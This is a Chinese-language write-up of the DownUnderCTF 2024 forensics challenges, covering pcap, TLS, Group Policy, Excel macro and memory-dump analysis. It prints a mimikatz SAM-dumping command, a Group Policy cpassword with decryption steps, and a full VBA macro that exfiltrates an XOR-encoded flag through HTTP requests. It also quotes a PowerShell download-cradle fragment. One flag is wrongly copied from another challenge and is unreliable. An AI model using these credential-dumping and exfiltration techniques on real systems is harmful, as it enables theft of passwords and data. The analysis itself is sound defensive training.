经常参加取证赛事,跟CTF中的取证有很大差别,就想着整理一下CTF中的取证题,偶然发现有个国际赛专有方向的取证方向,就拿来复现一下
They’ve been trying to breach our infrastructure all morning! They’re trying to get more info on our covert kangaroos! We need your help, we’ve captured some traffic of them attacking us, can you tell us what tool they were using and its version?
NOTE: Wrap your answer in the DUCTF{}, e.g. DUCTF{nmap_7.25}
他们整个上午都在试图破坏我们的基础设施!他们正试图获得更多关于我们秘密袋鼠的信息!我们需要您的帮助,我们已经捕获了一些他们攻击我们的流量,您能告诉我们他们使用的是什么工具及其版本吗?
注意:将您的答案包装在 DUCTF{} 中,例如 DUCTF{nmap_7.25}
题目拿到是个流量包,对于这种分析黑客攻击流量的题,首先查看HTTP流,直接就可以发现黑客的工具和版本
flag: DUCTF{Nikto_2.1.6}
The attacker managed to gain Domain Admin on our rebels Domain Controller! Looks like they managed to log on with an account using WMI and dumped some files. Can you reproduce how they got the Administrator’s Password with the artifacts provided?
Place the Administrator Account’s Password in DUCTF{}, e.g. DUCTF{password123!}
攻击者设法在我们的反叛者域控制器上获得了域管理员!看起来他们设法使用 WMI 使用帐户登录并转储了一些文件。您能否重现他们如何使用提供的工件获得管理员密码?
将管理员帐户的密码放在 DUCTF{} 中,例如 DUCTF{password123!}
题目附件是SAM和system文件,可以利用这两个文件来获得计算机密码,可以用SAMinside或者mimikatz来提取密码。本题我们用mimikatz来解,有兴趣的可以尝试下SAMinside
mimikatz地址:https://github.com/gentilkiwi/mimikatz
lsadump::sam /sam:sam.bak /system:system.bak
拿到MD5值后找个网站解密即可,hashcat也可
flag: DUCTF{Nikto_2.1.6}
Looks like the attacker managed to access the rebels Domain Controller.
Can you figure out how they got access after pulling these artifacts from one of our Outpost machines?
看起来攻击者设法访问了反叛分子的域控制器。
你能弄清楚他们是如何从我们的一台 Outpost 机器中提取这些文物后获得访问权限的吗?
拿到附件是一脸懵的,结合题目名和附件可以猜测,bad poclicies是不好的策略,这些附件名应该是策略的唯一ID,结合题目分析,应该是策略出现问题导致域控制器被拿下,结合以上信息,我找到了如下文章
域渗透——利用SYSVOL还原组策略中保存的密码
通过学习我们了解到配置文件Groups.xml下的cpassword项记录着加密后的密码,用everything找到groups.xml
cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" 找到后利用Kali自带的组策略解密工具gpp-decrypt解密,gpp是Group Policy Preferences (组策略首选项)的缩写,也可以用链接里大佬的方法来解密
flag: DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
As all good nation states, we have our own malware and C2 for offensive operations. But someone has got the source code and is using it against us! Here’s a capture of traffic we found on one of our laptops…
与所有优秀的民族国家一样,我们有自己的恶意软件和 C2 用于进攻性操作。但是有人得到了源代码,并用它来对付我们!这是我们在一台笔记本电脑上发现的流量捕获……
附件:sslkeylogfile.txt 、challenge.pcap
给出这个sslkey可以发现是需要在wireshark上进行TLS解密,上一次见这种还是在首届盘古石决赛的题目里
在编辑->首选项里,Protocols选项下找到TLS,在(Pre)-Master-Secret log file栏目选择txt文件即可。
解密完成后分析流量包,发现这里不是HTTP1.1都是HTTP2,流量分析最好的方式还是逐个流分析,追踪HTTP2 后在第8流发现网站登录密码
在第23流发现GET请求,下面一大堆也许是文件名
在第34流发现JWT token字样
再然后,应该是登录进网站,需要伪造管理员权限来获取flag,利用JWT token,而第23流里的一大堆文件里应该就有管理员的JWT token,由于需要在线环境,这题无法继续复现下去,可以参考其他大佬比赛期间写的WP
We managed to pull this excel spreadsheet artifact from one of our Outpost machines. Its got something sus happening under the hood. After opening we found and captured some suspicious traffic on our network. Can you find out what this traffic is and find the flag!
我们成功地从一个前哨机器上提取了这个Excel电子表格文件。它在内部有些可疑的活动。打开后,我们在我们的网络上发现了一些可疑的流量。你能找出这些流量是什么,并找到旗帜吗?
注意:您不需要运行或启用宏,因此请解决。
打开Excel发现是一堆猴子,还提示我宏已经被禁用,而且此题告诉我不需要我来运行或者启动
首先来了解一下Excel里宏的概念
宏是使用VBA编程语言编写的,可以在Excel中自动执行一系列操作的指令集
这道题的目的是让我们来分析宏,我们可以使用oletools分析 具体项目地址:https://github.com/decalage2/oletools
pip install -U oletools
分析出大量数据,其中还包括base64编码,发现是假数据,也是,毕竟附件除了excel还有一个流量包,等会儿去看看
把提取出的代码保存
Public Function anotherThing(B As String, C As String) As String
Dim I As Long
Dim A As String
For I = 1 To Len(B)
A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
Next I
anotherThing = A
End Function
Public Function importantThing()
Dim tempString As String
Dim tempInteger As Integer
Dim I As Integer
Dim J As Integer
For I = 1 To 5
Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)
Next I
For I = 1 To 5
For J = I + 1 To 5
If Cells(J, 2).Value < Cells(I, 2).Value Then
tempString = Cells(I, 1).Value
Cells(I, 1).Value = Cells(J, 1).Value
Cells(J, 1).Value = tempString
tempInteger = Cells(I, 2).Value
Cells(I, 2).Value = Cells(J, 2).Value
Cells(J, 2).Value = tempInteger
End If
Next J
Next I
End Function
Public Function totalyFine(A As String) As String
Dim B As String
B = Replace(A, " ", "-")
totalyFine = B
End Function
Sub macro1()
Dim Path As String
Dim wb As Workbook
Dim A As String
Dim B As String
Dim C As String
Dim D As String
Dim E As String
Dim F As String
Dim G As String
Dim H As String
Dim J As String
Dim K As String
Dim L As String
Dim M As String
Dim N As String
Dim O As String
Dim P As String
Dim Q As String
Dim R As String
Dim S As String
Dim T As String
Dim U As String
Dim V As String
Dim W As String
Dim X As String
Dim Y As String
Dim Z As String
Dim I As Long
N = importantThing()
K = "Yes"
S = "Mon"
U = forensics(K)
V = totalyFine(U)
D = "Ma"
J = "https://play.duc.tf/" + V
superThing J
J = "http://flag.com/"
superThing J
G = "key"
J = "http://play.duc.tf/"
superThing J
J = "http://en.wikipedia.org/wiki/Emu_War"
superThing J
N = importantThing()
Path = ThisWorkbook.Path & "flag.xlsx"
Set wb = Workbooks.Open(Path)
Dim valueA1 As Variant
valueA1 = wb.Sheets(1).Range("A1").Value
MsgBox valueA1
wb.Close SaveChanges:=False
F = "gic"
N = importantThing()
Q = "Flag: " & valueA1
H = "Try Harder"
U = forensics(H)
V = totalyFine(U)
J = "http://downunderctf.com/" + V
superThing J
W = S + G + D + F
O = doThing(Q, W)
M = anotherThing(O, W)
A = something(O)
Z = forensics(O)
N = importantThing()
P = "Pterodactyl"
U = forensics(P)
V = totalyFine(U)
J = "http://play.duc.tf/" + V
superThing J
T = totalyFine(Z)
MsgBox T
J = "http://downunderctf.com/" + T
superThing J
N = importantThing()
E = "Forensics"
U = forensics(E)
V = totalyFine(U)
J = "http://play.duc.tf/" + V
superThing J
End Sub
Public Function doThing(B As String, C As String) As String
Dim I As Long
Dim A As String
For I = 1 To Len(B)
A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
Next I
doThing = A
End Function
Public Function superThing(ByVal A As String) As String
With CreateObject("MSXML2.ServerXMLHTTP.6.0")
.Open "GET", A, False
.Send
superThing = StrConv(.responseBody, vbUnicode)
End With
End Function
Public Function something(B As String) As String
Dim I As Long
Dim A As String
For I = 1 To Len(inputText)
A = A & WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))
Next I
something = A
End Function
Public Function forensics(B As String) As String
Dim A() As Byte
Dim I As Integer
Dim C As String
A = StrConv(B, vbFromUnicode)
For I = LBound(A) To UBound(A)
C = C & CStr(A(I)) & " "
Next I
C = Trim(C)
forensics = C
End Function
W = S + G + D + F
O = doThing(Q, W)
M = anotherThing(O, W) 上述代码中有以上几句,其中anotherThing函数是定义了一个异或操作,而W是几个变量值拼接得来,所以W是密钥
S = "Mon"
G = "key"
D = "Ma"
F = "gic"
W = "MonkeyMagic" 明文通过anotherThing异或为密文,已知密钥,找到密文后异或解密即可,因为给了流量包,那密文应该就藏在流量包里
在查看HTTP对象时,发现URL里有一堆的ASCII码,猜测应该就是密文,凭借经验就能看出第三个最长的是密文,不放心的可以试试其他三个,10进制转字符后分别是Try Harder、Pterodactyl、Forensics
解密即可
def decode(encoded, key):
a = ''.join(chr(encoded[i] ^ ord(key[(i) % len(key)])) for i in range(len(encoded)))
return a
m = [11, 3, 15, 12, 95, 89, 9, 52, 36, 61, 37, 54, 34, 90, 15, 86, 38, 26, 80, 19, 1, 60, 12, 38, 49, 9, 28, 38, 0, 81, 9, 2, 80, 52, 28, 19]
key = "MonkeyMagic"
flag = decode(m, key)
print(flag) flag: DUCTF{M4d3_W1th_AI_by_M0nk3ys}
Looks like one of our Emu soldiers ran something on an Outpost machine and now it’s doing strange things.
We took a memory dump as a precaution. Can you tell us whats going on?
This challenge has four parts to combine into the final flag with _ between each answer.
Find all four answers and combine them into the flag as all lower case like DUCTF{answer1_answer2_answer3_answer4}
eg. DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}
1. What was the name of the malicious executable? eg malicious.xlsm
2. What was the name of the powershell module used? eg invoke-mimikatz
3. What were the names of the two files executed from the malicious executable (In alphabetical order with – in between and no spaces)? eg malware.exe-malware2.exe
4. What was the password of the new account created through powershell? eg strong-password123
看起来我们的一位Emu士兵在前哨机器上运行了一些东西,现在它开始表现出一些奇怪的事情。我们作为预防措施进行了内存转储。你能告诉我们发生了什么吗?
这个挑战有四个部分需要组合成最终的旗帜,每个答案之间用下划线连接。找到所有四个答案并将它们组合成旗帜,全部用小写字母,格式如下:DUCTF{answer1_answer2_answer3_answer4}
例如:DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}
1. 恶意可执行文件的名称是什么?例如:malicious.xlsm
2. 使用的PowerShell模块名称是什么?例如:invoke-mimikatz
3. 从恶意可执行文件执行的两个文件的名称是什么(按字母顺序排列,中间用连字符连接,没有空格)?
例如:malware.exe-malware2.exe
4.通过PowerShell创建的新账户的密码是什么?例如:strong-password123
一道内存分析题,还是内存分析比较经典,爱用vol2,先初步分析
简单看一下四道题目,第一个查看可执行文件应该是直接找命令行就行,consoles命令
同样在consoles里找到下图内容,经过百度得知,这是利用Powershell来进行反弹shell,那这个就是与攻击相关的,先记下
看后面三道题,应该都和powershell有关,来dump出powershell相关的进程
通过pslist发现总共有三个powershell的进程,保险起见,我们选择父进程的powershell导出,也就是1136进程
python2 vol.py -f 1.raw --profile=Win7SP1x86_23418 memdump -p 1136 --dump-dir .
strings 1136.dmp | grep "iex (New-Object net.we" 搜索刚才暂记的内容,grep 匹配一下了解到是反射性的DLL注入攻击,那第二问答案为Invoke-ReflectivePEInjection,第三问为emu.dll-kiwi.dll
只剩下第四问,还是要从1136.dmp这里找
直接进行匹配,看看powershell输了什么命令
strings 1136.dmp | grep "powershell" 发现比较像是答案的数据,找AI问一下这段的含义:分析变量赋值:首先,查看$PKjAU变量的赋值。注意字符串中的拼接模式,比如 'dd'+'a/' 实际上是'dda/'。解码字符串:使用PowerShell 来执行字符串解码。由于字符串是从后往前拼接的,你可能需要编写一个 PowerShell 脚本来逆序解码这个字符串。
那就来厨房里转换一下
最终成功
flag:DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}
更多资源,敬请关注ZeroPointZero安全团队,公众号后台回复取证,获取题目附件
注:ZeroPointZero安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
原文始发于微信公众号(ZeroPointZero安全团队):DownUnderCTF 2024——取证方向题解
